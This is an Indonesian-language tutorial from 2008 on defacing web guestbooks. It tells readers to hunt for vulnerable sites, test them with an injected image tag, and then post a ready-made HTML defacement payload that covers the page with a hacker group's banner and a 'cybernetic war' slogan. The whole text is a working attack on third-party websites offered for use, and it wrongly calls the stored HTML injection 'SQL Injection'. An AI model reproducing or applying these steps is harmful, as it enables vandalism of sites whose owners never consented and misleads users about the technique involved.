Deface Web Guestbook 12/24/2008 03:20:00 3:20am December 24th, 2008 By disgorger Dengan menggunakan teknik SQL Injection,

kita bisa mendeface guestbook (bukutamu ) baik file php,asp,cfm,cgi,html dan lain2. Disini kamu musti usaha sendiri mencari target nya. Langkah-langkah nya : 1. www.target.my/guestbook.php Maka yg perlu kamu lakukan adalah mengisi kolom2 guestbook yg tersedia. Kamu ngg ak perlu mengisi kolom guestbook nya dgn identitas asli, cukup identitas palsu s aja. contoh : Nama : boneka lucu Email : boneka_2005@yahoo.com Website : www.boneka-lucu.com Asal : toko boneka Komentar : <img src="http://img289.imageshack.us/img289/3525/bart5fi.gif"> Perhatikan baik2 perintah yg ada di kolom komentar, dgn cara SQL Injection ke gu estbook tsb, disitu kita akan memasukkan sebuah gambar. Trus klik tombol "submit" atau tombol apa namanya yg ada di guestbook tsb. 2. Selanjutnya buka url/browsing baru trus ketik target tadi www.target.my/guest book.php Kalo hasilnya belum ada, coba klik tab "refresh" di samping url/browsing. Nah... muncul deh gambar yg kita masukin tadi di guestbook tsb. Berarti guestbook tsb b isa dideface. Catatan : Kalo nggak ada gambarnya, yg ada hanya tulisan <img src="http://img289.imageshac k.us/img289/3525/bart5fi.gif"> berarti guestbook tsb nggak bisa dideface. Kamu j gn kecewa ! cari target yg lain. 3. Kalo udah muncul gambar yg kita masukkan tadi, buka lagi guesbook tsb. Trus isi lagi kolom2 guestbook yg tersedia. contoh : Nama : deface Email : deface_2005@yahoo.com Website : www.deface.com Asal : dunia maya komentar : </DIV><DIV align=left><DIV id=Layer1 style="BORDER-RIGHT: #000000 1px; BORDER-TO P: #000000 1px; Z-INDEX: 1; LEFT: 0px; BORDER-LEFT: #000000 1px; WIDTH: 1000px; BORDER-BOTTOM: #000000 1px; POSITION: absolute; TOP: 0px; HEIGHT: 10000px; BACKG ROUND-COLOR: #000000; layer-background-color: #000000"><center><br><img border=" 0" src="http://img478.imageshack.us/img478/3472/hb6dr.jpg" width="473" height="2 53"><br><br><br><font face="Arial" color="#339999" size="6"><strong>J4mbi H4ck3r </strong></font><br><br><embed src="http://www.selbys.com/images/shotgun.swf" wi dth="191" height="252"></embed><br><br><font face="Verdana, Arial, Helvetica, sa ns-serif" color="#cccccc" size="2">Special Thank's<br><font face="Verdana, Arial , Helvetica, sans-serif" color="#cccc33" size="2">PeNc0peT_CiNtA<br><br><br><fon t face="Verdana, Arial, Helvetica, sans-serif" color="#cccccc" size="2">Dedicate d All Crew<br><font face="Verdana, Arial, Helvetica, sans-serif" color="#cccc33" size="2">Jambihackerlink & Solohackerlink<br><br><br><font face="Verdana, Arial

, Helvetica, sans-serif" color="#cccccc" size="2">Hey admin......do you a need h elp ?<br><font face="Verdana, Arial, Helvetica, sans-serif" color="#cccc33" size ="2">Matrix.Dal.Net - #Jambihackerlink</font><br><br><br><strong><font face="Ari al" size="6" color="#339999"><marquee width="30%">We ready cybernetic war !!! </ marquee></font></strong></DIV></DIV> Perhatikan baik2 perintah yg ada di kolom komentar, dgn cara SQL Injection ke gu estbook tsb, disitu kita akan memasukkan script utk deface. Catatan : Sebelum kamu memasukkan script diatas tadi, kamu edit dulu kata2 nya sesuai kein ginan kamu. 4. Klik tombol "submit" atau tombol apa namanya yg ada di guestbook tsb. Kalo udah, buka url/browsing baru lalu ketikkan situs target tadi, misal nya : w ww.target.my/guestbook.php Kalo nggak ada hasil nya coba klik tab Refresh yg ada diatas disamping url/brows ing.